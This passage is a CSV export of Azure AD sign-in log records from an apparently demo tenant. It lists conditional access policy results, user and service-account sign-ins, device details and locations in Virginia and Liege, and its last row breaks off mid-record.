+762,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:13.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4bf53989-47a3-4106-9d9a-1d6e80ec84df,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",c3948ee8-6ff9-4ccf-8b26-9737a6220c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c3948ee8-6ff9-4ccf-8b26-9737a6220c00,SigninLogs,Sucess,36.6404686,-78.26995087
+763,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:10.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,864d16c4-b496-4913-bcd8-5b96d4e8a512,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f605a2bb0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605a2bb0e00,SigninLogs,Sucess,36.6404686,-78.26995087
+764,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:08.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0c417b99-566f-43c4-a8ea-1ca774436ef6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 07:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",bc0aa217-4b7b-4726-a63d-f5733dab0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,bc0aa217-4b7b-4726-a63d-f5733dab0d00,SigninLogs,Sucess,36.6404686,-78.26995087
+765,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:10.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,864d16c4-b496-4913-bcd8-5b96d4e8a512,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b6b1e129-7976-4148-98ee-f605a2bb0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b6b1e129-7976-4148-98ee-f605a2bb0e00,SigninLogs,Sucess,36.6404686,-78.26995087
+766,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:41.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b22bbb2f-1eb4-43ee-8f57-7913f3570da2,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 07:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",973ebc26-a5be-4a53-afb2-eb08d7800d00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,973ebc26-a5be-4a53-afb2-eb08d7800d00,SigninLogs,Sucess,50.6406517,5.572050095
+767,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:45.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2c268d2a-fcf4-4a58-af8a-89478f683f35,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",de685954-2e2a-4f4b-8b35-c75c60dc0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,de685954-2e2a-4f4b-8b35-c75c60dc0e00,SigninLogs,Sucess,50.6406517,5.572050095
+768,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:16.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,99740437-0725-4078-a2f9-4fbfb63c5ab8,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",e4ad56a4-20cd-4ec9-8d5b-ecb8d8880d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,e4ad56a4-20cd-4ec9-8d5b-ecb8d8880d00,SigninLogs,Sucess,36.6404686,-78.26995087
+769,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,28:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:28,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': 